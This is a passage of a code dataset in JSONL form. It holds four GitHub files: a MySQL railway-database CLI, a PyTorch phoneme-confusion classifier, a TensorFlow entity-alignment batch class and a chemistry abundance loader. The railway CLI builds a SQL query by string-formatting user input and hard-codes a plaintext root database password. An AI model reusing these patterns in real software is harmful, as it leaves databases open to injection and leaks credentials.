TRAINS WHERE TrainName = '%s'\" % (n_name)\n cur.execute(query)\n tab = cur.fetchall()\n print(tabulate(tab, headers=\"keys\", tablefmt='psql'))\n return\n else:\n print(\"Please choose a valid option\")\n continue\n\ndef query1():\n query = \"\"\"\n SELECT P.FirstName AS \"First Name\", P.LastName AS \"Last Name\", P.DOB, P.Final, P.Class, P.Tier, P.SeatNo AS \"Seat Number\", P.Age, P.DOJ, P.TrainName AS \"Train Name\"\n FROM PASSENGERS P, PASSENGERS Q \n WHERE P.DOJ = Q.DOJ AND P.Final = Q.Final AND P.FirstName <> Q.FirstName AND P.LastName <> Q.LastName ORDER BY P.DOJ;\n \"\"\"\n cur.execute(query)\n tab = cur.fetchall()\n print(tabulate(tab, headers=\"keys\", tablefmt=\"psql\"))\n return\n\ndef query2():\n query = \"\"\"\n SELECT S.StationName AS \"Station Name\", S.StationID AS \"Station ID\", T.Count \n FROM STATIONS S, (\n SELECT COUNT(*) AS \"Count\", StationID \n FROM RUNS_THROUGH \n GROUP BY StationID \n ORDER BY COUNT(*) DESC \n LIMIT 1\n ) T \n WHERE S.StationID = T.StationID;\n \"\"\"\n cur.execute(query)\n tab = cur.fetchall()\n print(tabulate(tab, headers=\"keys\", tablefmt=\"psql\"))\n return\n\ndef query3():\n query = \"\"\"\n SELECT B.QuartersNo AS \"Quarters Number\", COUNT(*) AS \"Number of Residents\" \n FROM RAILWAY_EMPLOYEES_A A JOIN RAILWAY_EMPLOYEES_B B ON 
A.Designation = B.Designation \n GROUP BY B.QuartersNo;\n \"\"\"\n cur.execute(query)\n tab = cur.fetchall()\n print(tabulate(tab, headers=\"keys\", tablefmt=\"psql\"))\n return\n\ndef query4():\n query = \"\"\"\n SELECT FirstName AS \"First Name\", LastName AS \"Last Name\", Designation \n FROM RAILWAY_EMPLOYEES_A \n WHERE StationID = \"BCT\";\n \"\"\"\n cur.execute(query)\n tab = cur.fetchall()\n print(tabulate(tab, headers=\"keys\", tablefmt=\"psql\"))\n return\n\ndef query5():\n query = \"\"\"\n SELECT T.TrainNumber AS \"Train Number\", R.TrainName AS \"Train Name\" \n FROM RUNS_THROUGH R, RUNS_THROUGH S, TRAINS T \n WHERE R.TrainName = S.TrainName AND R.StationID=\"SEC\" AND S.StationID=\"BCT\" AND R.TrainName = T.TrainName;\n \"\"\"\n cur.execute(query)\n tab = cur.fetchall()\n print(tabulate(tab, headers=\"keys\", tablefmt=\"psql\"))\n return\n\n\ndef dispatch(ch):\n \"\"\"\n Function that maps helper functions to option entered\n \"\"\"\n\n if(ch == 1):\n query1()\n elif(ch == 2):\n query2()\n elif(ch == 3):\n query3()\n elif(ch == 4):\n query4()\n elif(ch == 5):\n query5()\n elif(ch == 6):\n renovate()\n elif(ch == 7):\n promote()\n elif(ch == 8):\n pre_postpone()\n else:\n print(\"Error: Invalid Option\")\n\n\n# Global\nwhile(1):\n tmp = sp.call('clear', shell=True)\n \n # Can be skipped if you want to hardcode username and password\n # username = input(\"Username: \")\n # password = input(\"Password: \")\n\n try:\n # Set db name accordingly which have been create by you\n # Set host to the server's address if you don't want to use local SQL server \n con = pymysql.connect(host='localhost',\n port=3306,\n user=\"root\",\n password=\"Babloo@2003\",\n db='RAILWAY',\n cursorclass=pymysql.cursors.DictCursor)\n tmp = sp.call('clear', shell=True)\n\n if(con.open):\n print(\"Connected\")\n else:\n print(\"Failed to connect\")\n\n tmp = input(\"Enter any key to CONTINUE>\")\n\n with con.cursor() as cur:\n while(1):\n tmp = sp.call('clear', shell=True)\n print(\"1. Query 1\") \n print(\"2. Query 2\")\n print(\"3. Query 3\")\n print(\"4. Query 4\")\n print(\"5. Query 5\")\n print(\"6. Renovate\") \n print(\"7. Promote Employee\") \n print(\"8. Change DOJ\") \n print(\"9. 
Logout\")\n ch = int(input(\"Enter choice> \"))\n tmp = sp.call('clear', shell=True)\n if ch == 9:\n exit()\n else:\n dispatch(ch)\n tmp = input(\"Enter any key to CONTINUE>\")\n\n except Exception as e:\n tmp = sp.call('clear', shell=True)\n print(e)\n print(\"Connection Refused: Either username or password is incorrect or user doesn't have access to database\")\n tmp = input(\"Enter any key to CONTINUE>\")\n","repo_name":"SasidharChavali/DnA_Railway-Miniworld-CLI","sub_path":"queries.py","file_name":"queries.py","file_ext":"py","file_size_in_byte":10010,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"27979307253","text":"from src.data_loader import DataLoader\nimport pickle\nimport torch\nfrom torch import nn, optim, utils\nimport torch.nn.functional as F\nimport torch.utils.data\nimport numpy as np\nimport more_itertools\nfrom sklearn.metrics import confusion_matrix, roc_curve\nfrom matplotlib import pyplot\n\nclass FFNN(nn.Module):\n\t\"\"\"\n\tArchitecture definition for fully-connected neural network\n\t\"\"\"\n\tdef __init__(self, forward_context, backward_context, embed_dim, phoneme_count, error_weight):\n\t\tsuper().__init__()\n\n\t\t# Parameters\n\t\tself.forward_context = forward_context\n\t\tself.backward_context = backward_context\n\t\tself.embed_dim = embed_dim\n\t\tself.phoneme_count = phoneme_count\n\t\tself.error_weight = error_weight\n\n\t\t# Layers\n\t\tself.embed = nn.Embedding(self.phoneme_count, self.embed_dim)\n\t\tself.linear1 = nn.Linear(self.embed_dim * (self.forward_context + self.backward_context + 1), 512)\n\t\tself.linear2 = nn.Linear(512, 256)\n\t\tself.linear3 = nn.Linear(256, 256)\n\t\tself.linear4 = nn.Linear(256, 128)\n\t\tself.linear5 = nn.Linear(128, 128)\n\t\tself.linear6 = nn.Linear(128, 64)\n\t\tself.linear7 = nn.Linear(64, 64)\n\t\tself.linear8 = nn.Linear(64, 1)\n\n\tdef forward(self, inputs):\n\t\tout = self.embed(inputs)\n\t\tout = torch.reshape(out, (-1, self.embed_dim * (self.forward_context + self.backward_context + 1)))\n\t\tout = F.relu(self.linear1(out))\n\t\tout = F.relu(self.linear2(out))\n\t\tout = F.relu(self.linear3(out))\n\t\tout = F.relu(self.linear4(out))\n\t\tout = F.relu(self.linear5(out))\n\t\tout = F.relu(self.linear6(out))\n\t\tout = F.relu(self.linear7(out))\n\t\tout = torch.sigmoid(self.linear8(out))\n\n\t\treturn out\n\n\tdef save(self, path):\n\t\t\"\"\"\n\t\tSaves model to a file.\n\t\t\n\t\t:param path: path to file where to save model\n\t\t\"\"\"\n\t\tsettings = {'model': FFNN(self.forward_context, self.backward_context, self.embed_dim, \n\t\t\tself.phoneme_count, self.error_weight), 'state_dict': self.state_dict()}\n\t\ttorch.save(settings, path)\n\n\t@classmethod\n\tdef load(cls, path):\n\t\t\"\"\"\n\t\tLoads model (oppposite of 'save' function).\n\n\t\t:param path: path to file where model is saved\n\t\t\"\"\"\n\t\tfile = torch.load(path)\n\t\tmodel = file['model']\n\t\tmodel.load_state_dict(file['state_dict'])\n\t\treturn model\n\ndef data_transformer(data, forward_context, backward_context, vocab_size):\n\t\"\"\"\n\tGiven list of list of phonemes representing phrases, as well as binary labels specifying \n\twhether the phoneme was transcribed correctly, splits into smaller lists with appropriate \n\tpadding to form uniformly-sized tensor\n\t\n\t:param data: the data which padding should be applied to (tensor with input and output)\n\t:param forward_context: the amount of padding to add after the last phoneme\n\t:param backward_context: the amount of 
padding to add before the first phoneme\n\t\"\"\"\n\tSTART_TOKEN = vocab_size - 2 # TO DO: double check these subtractions\n\tEND_TOKEN = vocab_size - 1\n\tstart_padding = forward_context\n\tend_padding = backward_context\n\n\tx, y = data\n\t\n\tinputs = []\n\tfull_phrases = []\n\tfor phrase in x:\n\t\tpadded_phrase = [START_TOKEN] * start_padding + phrase + [END_TOKEN] * end_padding\n\t\tnew_sub_phrases = list(more_itertools.windowed(padded_phrase, n = 1 + start_padding + end_padding))\n\t\tinputs.extend(new_sub_phrases)\n\t\tfull_phrases.extend([phrase] * len(new_sub_phrases))\n\t\n\tinputs = torch.tensor(inputs, dtype = torch.int64)\n\ttargets = torch.tensor(np.concatenate(y), dtype = torch.float).reshape(-1, 1)\n\n\treturn inputs, targets, full_phrases\n\ndef phonemes_to_phrase(show_transcription = True):\n\t\"\"\"\n\tReturns a dictionary that converts a list of phonemes into the English phrase that created it \n\t\n\t:param show_transcription: Whether ground truth phrases or both ground truth phrases and transcription should be shown\n\t\"\"\"\n\n\tfrom align_phonemes import load_data, load_phonemes, text2phonemes\n\tfrom src.phonemes import DATA_DIR, FILES, PHONEME_OUT\n\n\ttrue_phrases, transcribed_phrases = load_data(DATA_DIR, FILES)\n\tphoneme_dictionary = load_phonemes(PHONEME_OUT)\n\t\n\tif show_transcription:\n\t\tphoneme2phrase = {text2phonemes(true_phrases[i], phoneme_dictionary) : (true_phrases[i], transcribed_phrases[i]) for i in range(len(true_phrases))}\n\telse:\n\t\tphoneme2phrase = {text2phonemes(phrase, phoneme_dictionary) : phrase for phrase in true_phrases}\n\n\treturn phoneme2phrase\n\ndef ROC(y_target, y_probability, path):\n\t\"\"\"\n\tReturns data to plot ROC curve\n\n\t:params y_target: The true label\n\t:params y_probability: The predicted probability\n\t:params path: Where to save the text file with ROC curve data\n\t\"\"\"\n\tfpr, tpr, thresholds = roc_curve(y_true = y_target, y_score = y_probability)\n\n\twith open(path, 'w') as f:\n\t\tf.write('FPR,TPR,THRESHOLDS')\n\t\tfor i in range(1, len(fpr), 500): # Ignoring first row due to arbitrary calculation, skipping rows for small file\n\t\t\tf.write('\\n' + str(fpr[i]) + ',' + str(tpr[i]) + ',' + str(thresholds[i]))\n\n\treturn fpr, tpr, thresholds\n\ndef evaluate_model(model, validation_data, forward_context, backward_context, vocab_size, \n\terror_weight, show_transcription, roc = None, decoder = None, phrase_count = 0):\n\t\"\"\"\n\tHelper function to evaluate trained model on validation (or test) data\n\n\t:param model: trained model to use for predictions\n\t:param validation_data: dataloader with input and ground truth pairs\n\t:param forward_context: Number of phonemes after (context)\n\t:param backward_context: Number of phonemes before (context)\n\t:param vocab_size: Number of token types\n\t:param error_weight: Multiplier for the penalty for not identifying errors correctly vs. 
identifying non-errors correctly\n\t:param show_transcription: Whether ground truth phrases or both ground truth phrases and transcription should be shown\n\t:param roc: Whether to write ROC curve information to a file (provide path if so)\n\t:param decoder: Dictionary with integers as keys and phonemes as values; must be provided if phrase_count > 0\n\t:param phrase_count: Number of maximum and minimum predicted error phrases to print\n\t\"\"\"\n\n\tval_targets = torch.tensor([])\n\tval_predictions = torch.tensor([])\n\tval_inputs = torch.tensor([], dtype = torch.int64)\n\tval_full_phrases = []\n\n\tfor minibatch in validation_data:\n\t\tnew_inputs, new_targets, new_full_phrases = data_transformer(minibatch, forward_context, backward_context, vocab_size)\n\t\tnew_predictions = model(new_inputs)\n\t\tval_targets = torch.cat((val_targets, new_targets))\n\t\tval_predictions = torch.cat((val_predictions, new_predictions))\n\t\tval_inputs = torch.cat((val_inputs, new_inputs))\n\t\tval_full_phrases.extend(new_full_phrases)\n\n\tif phrase_count > 0 and decoder:\n\t\tsort_ids = np.argsort(val_predictions.detach().numpy().ravel())\n\t\tphoneme2phrase = phonemes_to_phrase(show_transcription)\n\n\t\tprint('######################################################################')\n\t\tprint('Top', str(phrase_count), 'Predicted Least Confusing Phrases')\n\t\tprint('Predicted Confusion:')\n\t\tprint(val_predictions.detach().numpy()[sort_ids[:phrase_count]])\n\t\t\n\t\tprint('Phrases:')\n\t\tphrases = val_inputs.detach().numpy()[sort_ids[:phrase_count]]\n\t\tprint(phrases)\n\t\t\n\t\tprint('Translated Phrases:')\n\t\tprint(np.vectorize(decoder.get)(phrases))\n\n\t\tprint('English Phrases (True, Transcribed):')\n\t\tphoneme_list = [[decoder[integer] for integer in val_full_phrases[phrase]] for phrase in sort_ids[:phrase_count]]\n\t\tprint([phoneme2phrase[' '.join(phonemes)] for phonemes in phoneme_list])\n\t\t\n\t\tprint('Actual Confusion?')\n\t\tprint(val_targets.detach().numpy()[sort_ids[:phrase_count]])\n\n\t\tprint('######################################################################')\n\t\tprint('Top', str(phrase_count), 'Predicted Most Confusing Phrases')\n\t\tprint('Predicted Confusion:')\n\t\tprint(np.flip(val_predictions.detach().numpy()[sort_ids[-phrase_count:]], axis = 0))\n\t\t\n\t\tprint('Phrases:')\n\t\tphrases = np.flip(val_inputs.detach().numpy()[sort_ids[-phrase_count:]], axis = 0)\n\t\tprint(phrases)\n\t\t\n\t\tprint('Translated Phrases:')\n\t\tprint(np.vectorize(decoder.get)(phrases))\n\t\t\n\t\tprint('English Phrases (True, Transcribed):')\n\t\tphoneme_list = np.flip([[decoder[integer] for integer in val_full_phrases[phrase]] for phrase in sort_ids[-phrase_count:]], axis = 0)\n\t\tprint([phoneme2phrase[' '.join(phonemes)] for phonemes in phoneme_list])\n\n\t\tprint('Actual Confusion?')\n\t\tprint(np.flip(val_targets.detach().numpy()[sort_ids[-phrase_count:]], axis = 0))\n\n\tif roc:\n\t\tROC(val_targets.detach().numpy(), val_predictions.detach().numpy(), roc)\n\n\tval_weights = torch.where(val_targets == 1, torch.tensor(error_weight, dtype = torch.float), torch.tensor(1, dtype = torch.float))\n\tvalidation_loss = float(F.binary_cross_entropy(val_predictions, val_targets, weight = val_weights, reduction = 'sum').detach()) / len(val_predictions)\n\ttn, fp, fn, tp = confusion_matrix(y_true = val_targets.detach().numpy(), y_pred = np.round(val_predictions.detach().numpy())).ravel()\n\n\treturn validation_loss, tn, fp, fn, tp\n\ndef train(model_parameters):\n\t\"\"\"\n\tTrains neural network given a dictionary of parameters with the following values.\n\n\t:param data_dir: Where transcripts are stored\n\t:param phoneme_out: Phoneme translation file\n\t:param forward_context: Number of phonemes after (context)\n\t:param backward_context: Number of phonemes before (context)\n\t:param embed_dim: Number of dimensions in phoneme embedding\n\t:param num_epochs: Number of epochs to train neural network for\n\t:param batch_size: Number of phrases to process at once (split into phonemes)\n\t:param error_weight: Multiplier for the penalty for not identifying errors correctly vs. identifying non-errors correctly\n\t:param weights_path: Location where to save models during training\n\t:param print_batch: Frequency with which to print updates\n\t:param loss_multiplier: Multiplying constant to make reading loss values easier\n\t:param save_epoch: Model is saved at any multiple of this number of epochs\n\t\"\"\"\n\t# Unpacking variables\n\tDATA_DIR = model_parameters['data_dir']\n\tPHONEME_OUT = model_parameters['phoneme_out']\n\tforward_context = model_parameters['forward_context']\n\tbackward_context = model_parameters['backward_context']\n\tembed_dim = model_parameters['embed_dim']\n\tnum_epochs = model_parameters['num_epochs']\n\tbatch_size = model_parameters['batch_size']\n\terror_weight = model_parameters['error_weight']\n\tweights_path = model_parameters['weights_path']\n\tprint_batch = model_parameters['print_batch']\n\tloss_multiplier = model_parameters['loss_multiplier']\n\tsave_epoch = model_parameters['save_epoch']\n\n\t# Instantiation\n\tprint('Setting everything up...')\n\tvocab_size = DataLoader(DATA_DIR, PHONEME_OUT, 'hypothesis', 'full', 'train', batch_size = batch_size).vocab_size + 2 # Adding 2 for start/end padding\n\ttraining_data = DataLoader(DATA_DIR, PHONEME_OUT, 'hypothesis', 'binary', 'train', batch_size = batch_size)\n\tvalidation_data = DataLoader(DATA_DIR, PHONEME_OUT, 'hypothesis', 'binary', 'val', batch_size = batch_size)\n\n\tmodel = FFNN(forward_context = forward_context, backward_context = backward_context, embed_dim = embed_dim, phoneme_count = vocab_size, error_weight = error_weight)\n\topt = optim.Adam(model.parameters())\n\n\t# Model training\n\tprint('Starting training!')\n\ti = 1\n\tbest_validation_loss = np.inf\n\n\twhile i <= num_epochs:\n\n\t\ttraining_loss = 0\n\t\tmb = 1\n\t\tpredictions_made = 0\n\n\t\tprint('######################################################################', '\\nEpoch', \n\t\t\ti, '\\n######################################################################')\n\n\t\tfor minibatch in training_data:\n\t\t\topt.zero_grad()\n\n\t\t\tinputs, targets, _ = data_transformer(minibatch, forward_context, backward_context, vocab_size)\n\t\t\tpredictions = model(inputs)\n\t\t\tweights = torch.where(targets == 1, torch.tensor(error_weight, dtype = torch.float), torch.tensor(1, dtype = torch.float))\n\t\t\tloss = F.binary_cross_entropy(predictions, targets, weight = weights, reduction = 'sum')\n\n\t\t\tloss.backward()\n\t\t\topt.step()\n\n\t\t\ttraining_loss += float(loss.detach())\n\t\t\t\n\t\t\tmb += 1\n\t\t\tpredictions_made += len(predictions)\n\n\t\t\tif mb % print_batch == 0:\n\t\t\t\tprint('Minibatch', mb, 'Cumulative Training Loss:', training_loss / predictions_made * loss_multiplier)\n\t\t\t\ttn, fp, fn, tp = confusion_matrix(y_true = targets.detach().numpy(), y_pred = np.round(predictions.detach().numpy())).ravel()\n\t\t\t\tprint('TN:', tn, '| FP:', fp, '| FN:', fn, '| TP:', tp, '| Accuracy:', (tn + tp) / (tn + fp + fn + tp))\n\n\t\tvalidation_loss, tn, fp, fn, tp = evaluate_model(model, validation_data, forward_context, backward_context, vocab_size, error_weight)\n\n\t\tif i % save_epoch == 0:\n\t\t\tlocation = weights_path + 'epoch_' + str(i) + '_' + str(round(validation_loss * loss_multiplier, 3)) + '.weights'\n\t\t\tmodel.save(location)\n\n\t\tprint('######################################################################', '\\nEpoch', i, \n\t\t\t'Training Loss:', training_loss / predictions_made * loss_multiplier, \n\t\t\t'| Validation Loss:', validation_loss * loss_multiplier)\n\t\tprint('TN:', tn, '| FP:', fp, '| FN:', fn, '| TP:', tp, '| Accuracy:', (tn + tp) / (tn + fp + fn + tp))\n\n\t\ti += 1\n\t\ndef investigate_model(model_parameters, file):\n\t\"\"\"\n\tGiven a trained model name, outputs its performance on validation (test) data\n\n\t:param model_parameters: dictionary with model parameters:\n\t\tUses data directory, phoneme file, weights_path, batch size, loss_multiplier, and ROC location (where to write file)\n\t:param file: file path where model is saved\n\t\"\"\"\n\tDATA_DIR = model_parameters['data_dir']\n\tPHONEME_OUT = model_parameters['phoneme_out']\n\tbatch_size = model_parameters['batch_size']\n\tloss_multiplier = model_parameters['loss_multiplier']\n\tweights_path = model_parameters['weights_path']\n\troc = model_parameters['roc_location']\n\n\tprint('Hold on. Fetching results!')\n\n\tvalidation_data = DataLoader(DATA_DIR, PHONEME_OUT, 'hypothesis', 'binary', 'test', batch_size = batch_size)\n\tint_to_phoneme = dict((v,k) for k,v in validation_data.phoneme_to_int.items())\n\n\tmodel = FFNN.load(weights_path + file)\n\tvalidation_loss, tn, fp, fn, tp = evaluate_model(model, validation_data, model.forward_context, \n\t\tmodel.backward_context, model.phoneme_count, model.error_weight, roc = roc, show_transcription = True, decoder = int_to_phoneme, phrase_count = 5)\n\n\tprint('######################################################################', '\\nValidation Loss:', validation_loss * loss_multiplier)\n\tprint('TN:', tn, '| FP:', fp, '| FN:', fn, '| TP:', tp, '| Accuracy:', (tn + tp) / (tn + fp + fn + tp))\n\ndef investigate_data(model_parameters, path):\n\t\"\"\"\n\tReturns number of phonemes correctly and incorrectly transcribed in dataset, by phoneme\n\n\t:param model_parameters: dictionary with model parameters:\n\t\tUses data directory, phoneme file, batch size\n\t:param path: file where phoneme data saved\n\t\"\"\"\n\tfrom collections import Counter\n\n\tDATA_DIR = model_parameters['data_dir']\n\tPHONEME_OUT = model_parameters['phoneme_out']\n\tbatch_size = model_parameters['batch_size']\n\n\ttrain_data = DataLoader(DATA_DIR, PHONEME_OUT, 'hypothesis', 'binary', 'train', batch_size = batch_size)\n\tint_to_phoneme = dict((v,k) for k,v in train_data.phoneme_to_int.items())\n\n\tcnt_correct = Counter()\n\tcnt_incorrect = Counter()\n\n\tfor x, y in train_data:\n\t\tx = [phoneme for phrase in x for phoneme in phrase]\n\t\ty = [label for phrase in y for label in phrase]\n\t\tfor i in range(len(x)):\n\t\t\tif y[i]:\n\t\t\t\tcnt_incorrect[int_to_phoneme[x[i]]] += 1\n\t\t\telse:\n\t\t\t\tcnt_correct[int_to_phoneme[x[i]]] += 1\n\t\n\twith open(path, 'w') as f:\n\t\tf.write('PHONEME,CORRECT,INCORRECT')\n\t\tfor key, value in cnt_correct.items():\n\t\t\tf.write('\\n' + str(key) + ',' + str(value) + ',' + str(cnt_incorrect[key]))\n\ntorch.manual_seed(1) # seed the RNG for reproducibility\nmodel_parameters = 
{\n\t'forward_context':\t4,\n\t'backward_context':\t4,\n\t'embed_dim':\t\t15,\n\t'num_epochs':\t\t100,\n\t'batch_size':\t\t32,\n\t'error_weight':\t\t10,\n\t'weights_path':\t\t'../models/',\n\t'data_dir':\t\t\t'../data/transcripts/',\n\t'phoneme_out':\t\t'../data/phonemes.txt',\n\t'roc_location':\t\t'../roc.csv',\n\t'print_batch':\t\t100,\n\t'loss_multiplier':\t10**3,\n\t'save_epoch':\t\t1\n}\n\n\ntrain(model_parameters)\ninvestigate_model(model_parameters, file = 'epoch_7_1135.176.weights')\n#investigate_data(model_parameters, '../diagrams/phoneme_frequency.csv')","repo_name":"francois-rd/phonemic-confusion","sub_path":"src/ff.py","file_name":"ff.py","file_ext":"py","file_size_in_byte":15925,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"71597676627","text":"# coding:utf-8\nimport numpy as np\nimport tensorflow as tf\nimport json\nfrom tqdm import tqdm\nimport random\nimport timeit\nimport os\nimport itertools\n\n\nclass Batch(object):\n\n def get_batch(self):\n n_triple = len(self.triple_train)\n rand_idx = np.random.permutation(n_triple)\n start = 0\n batchsize = int(n_triple / self.nbatches)\n while start < batchsize * self.nbatches:\n start_t = timeit.default_timer()\n end = min(start + batchsize, n_triple)\n size = end - start\n train_triple_positive = list([self.triple_train[x] for x in rand_idx[start:end]])\n train_triple_negative = []\n for t in train_triple_positive:\n random_num = np.random.random()\n source_entity_id_list = list(range(self.sourceentitytotal))\n target_entity_id_list = list(range(self.targetentitytotal))\n source_entity_id_list.remove(t[0])\n target_entity_id_list.remove(t[1])\n if str(t[0]) in self.source_constrain_dict['dij'].keys():\n dis_samp_source = self.source_constrain_dict['dij'][str(t[0])]\n else: dis_samp_source = []\n if str(t[1]) in self.target_constrain_dict['dij'].keys():\n dis_samp_target = self.target_constrain_dict['dij'][str(t[1])]\n else: dis_samp_target = []\n if self.negative_ent <= len(dis_samp_source):\n replace_source_entity_id_list = random.sample(dis_samp_source, self.negative_ent)\n else:\n try:\n for ntri in self.source_constrain_dict['sbc'][str(t[0])] + dis_samp_source:\n if ntri in source_entity_id_list: \n source_entity_id_list.remove(ntri)\n else:\n pass\n except KeyError:\n pass\n tem = random.sample(source_entity_id_list, self.negative_ent - len(dis_samp_source))\n replace_source_entity_id_list = dis_samp_source + tem\n if self.negative_ent <= len(dis_samp_target):\n replace_target_entity_id_list = random.sample(dis_samp_target, self.negative_ent)\n else:\n try:\n for targettri in self.target_constrain_dict['sbc'][str(t[1])] + dis_samp_target:\n if targettri in target_entity_id_list: \n target_entity_id_list.remove(targettri)\n else:\n pass\n except KeyError:\n pass\n tem = random.sample(target_entity_id_list, self.negative_ent - len(dis_samp_target))\n replace_target_entity_id_list = dis_samp_target + tem\n if self.negative_sampling == 'unif':\n replace_source_probability = 0.5\n else:\n pass\n if self.modelname == \"trans\":\n for mt in replace_target_entity_id_list:\n train_triple_negative.append((t[0], mt))\n else:\n pass\n self.p_positive_batch_n = list([x[0] for x in train_triple_positive])\n self.p_positive_batch_m = list([x[1] for x in train_triple_positive])\n self.p_negative_batch_n = list([triple[0] for triple in train_triple_negative])\n self.p_negative_batch_m = list([triple[1] for triple in train_triple_negative])\n self.p_batch_n = 
self.p_positive_batch_n + self.p_negative_batch_n\n self.p_batch_m = self.p_positive_batch_m + self.p_negative_batch_m\n start = end\n prepare_t = timeit.default_timer() - start_t\n if self.modelname == \"trans\":\n yield self.p_batch_n, self.p_batch_m, prepare_t\n else:\n pass\n\n def __init__(self):\n self.negative_sampling = 'unif'\n self.triple_train = []\n self.sourceentitytotal = 0\n self.targetentitytotal = 0\n self.sourcerelationtotal = 0\n self.targetrelationtotal = 0\n self.sourceent2id = {}\n self.targetent2id = {}\n self.tripletotal = 0\n self.constrain_source_tripletotal = 0\n self.constrain_target_tripletotal = 0\n self.in_path = \"\"\n self.nbatches = 0\n self.negative_ent = 1\n self.modelname = None\n\n def readData(self):\n\n with open(os.path.join(self.in_path, 'ent_ids_source.txt')) as f:\n self.sourceent2id = {line.strip().split('\\t')[1]: int(line.strip().split('\\t')[0]) for line in f.readlines()}\n with open(os.path.join(self.in_path, 'ent_ids_target.txt')) as f:\n self.targetent2id = {line.strip().split('\\t')[1]: int(line.strip().split('\\t')[0]) for line in f.readlines()}\n with open(os.path.join(self.in_path, 'neg_constrain_source.json')) as f:\n self.source_constrain_dict = json.load(f)\n with open(os.path.join(self.in_path, 'neg_constrain_target.json')) as f:\n self.target_constrain_dict = json.load(f)\n self.triple_train = self.readTriple('train.txt')\n self.sourceentitytotal = len(self.sourceent2id)\n self.targetentitytotal = len(self.targetent2id)\n self.sourcerelationtotal = len(self.sourceent2id)\n self.targetrelationtotal = len(self.targetent2id)\n self.tripletotal = len(self.triple_train)\n \n\n def readTriple(self, filename):\n triple_list = []\n train_list = []\n with open(os.path.join(self.in_path, filename)) as f:\n for line in f.readlines():\n train_list = line.strip().split('\\t')\n triple_list.append((int(train_list[0]), int(train_list[1])))\n\n return triple_list\n\n def setBatches(self, nbatches):\n self.nbatches = nbatches\n\n def inPath(self, path):\n self.in_path = path\n\n def negRate(self, rate):\n self.negative_ent = rate\n\n def negativeSampling(self, negative_sampling):\n self.negative_sampling = negative_sampling\n\n def model_name(self, name):\n self.modelname = name\n\nclass Config(Batch):\n\n def __init__(self):\n Batch.__init__(self)\n self.out_path = None\n self.train_times = 0\n self.alpha = 0.001\n self.log_on = 1\n self.dimension = 100\n self.exportName = None\n self.importName = None\n self.export_steps = 0\n self.opt_method = \"SGD\"\n self.optimizer = None\n\n\n def init(self):\n if self.in_path != None:\n self.readData()\n self.sourceenttotal = self.sourceentitytotal\n self.targetenttotal = self.targetentitytotal\n self.sourcereltotal = self.sourcerelationtotal\n self.targetreltotal = self.targetrelationtotal\n self.batchsize = int(self.tripletotal / self.nbatches)\n self.batch_seq_size = self.batchsize * (1 + self.negative_ent)\n self.batch_n = np.zeros(self.batchsize * (1 + self.negative_ent), dtype=np.int64)\n self.batch_m = np.zeros(self.batchsize * (1 + self.negative_ent), dtype=np.int64)\n\n def optimizer(self, optimizer):\n self.optimizer = optimizer\n\n def optMethod(self, method):\n self.opt_method = method\n\n def learningRate(self, alpha):\n self.alpha = alpha\n\n def vecFiles(self, path):\n self.out_path = path\n\n def entDimension(self, dim):\n self.dimension = dim\n\n def trainTimes(self, times):\n self.train_times = times\n\n def exportFiles(self, path, steps=0):\n self.exportName = path\n self.export_steps = 
steps\n\n def saveTF(self):\n with self.graph.as_default():\n with self.sess.as_default():\n self.saver.save(self.sess, self.exportName)\n\n def parameters_name(self, var_name):\n with self.graph.as_default():\n with self.sess.as_default():\n if var_name in self.trainModel.parameter_lists:\n return self.sess.run(self.trainModel.parameter_lists[var_name])\n else:\n return None\n\n def get_parameters(self, mode=\"numpy\"):\n res = {}\n lists = self.trainModel.parameter_lists\n for var_name in lists:\n if mode == \"numpy\":\n res[var_name] = self.parameters_name(var_name)\n else:\n res[var_name] = self.parameters_name(var_name).tolist()\n return res\n\n def save_parameters(self, path=None):\n if path == None:\n path = self.out_path\n f = open(path, \"w\")\n f.write(json.dumps(self.get_parameters(\"list\")))\n f.close()\n\n def model(self, model):\n self.model = model\n self.graph = tf.Graph()\n with self.graph.as_default():\n self.sess = tf.Session()\n with self.sess.as_default():\n initializer = tf.contrib.layers.xavier_initializer(uniform=True)\n with tf.variable_scope(\"model\", reuse=None, initializer=initializer):\n self.trainModel = self.model(config=self)\n self.optimizer = tf.train.GradientDescentOptimizer(self.alpha)\n grads_and_vars = self.optimizer.compute_gradients(self.trainModel.pro_loss)\n self.train_op = self.optimizer.apply_gradients(grads_and_vars)\n self.saver = tf.train.Saver()\n self.sess.run(tf.initialize_all_variables())\n\n def train(self, batch_h, batch_t):\n feed_dict = {\n self.trainModel.batch_n: batch_h,\n self.trainModel.batch_m: batch_t}\n _,pro_loss = self.sess.run([self.train_op, self.trainModel.pro_loss], feed_dict)\n return pro_loss\n\n def run(self):\n with self.graph.as_default():\n with self.sess.as_default():\n for times in tqdm(range(self.train_times)):\n pro_res = 0.0\n if self.modelname == 'trans':\n for bn, bm, _ in self.get_batch():\n pro = self.train(bn, bm)\n pro_res += pro\n else:\n pass\n #self.saveTF()\n self.save_parameters(self.out_path)\n","repo_name":"ellenzhuwang/AgreementMakerDeep","sub_path":"conf/oaei-resources/Config.py","file_name":"Config.py","file_ext":"py","file_size_in_byte":10489,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"38303946745","text":"import numpy as np\nimport sys\nfrom read_one import read_ggchem_file\n\ndef load(dir, species_info_file): \n metallicities = np.arange(-1, 3.0+0.1, 0.1)\n COs = np.array([0.05, 0.1, 0.2, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9, 0.95, 1.0, 1.05, 1.1, 1.2, 1.4, 1.6, 1.8, 2.0])\n all_data = []\n \n for m_index, m in enumerate(metallicities):\n data_for_Z = []\n for co_index, co in enumerate(COs):\n if m < 1e-4 and m > -1e-4: m = 0\n if co == 0.95:\n co_string = \"0.95\"\n elif co == 1.05:\n co_string = \"1.05\"\n else:\n co_string = \"{:.1f}\".format(co)\n filename = \"{}/result_{:.1f}_{}/Static_Conc_2D.dat\".format(dir, m, co_string)\n print(filename, m)\n\n abund_dict, abund_arr = read_ggchem_file(filename, species_info_file)\n data_for_Z.append(abund_arr)\n #all_data.append(abund_arr)\n all_data.append(data_for_Z)\n \n all_data = np.array(all_data)\n\n #Want shape to be: (N_P, N_T, N_species, N_CO, N_metallicites)\n all_data = all_data.transpose([0, 1, 2, 4, 3])\n np.save(\"all_data.npy\", all_data)\n\n\nload(sys.argv[1], 
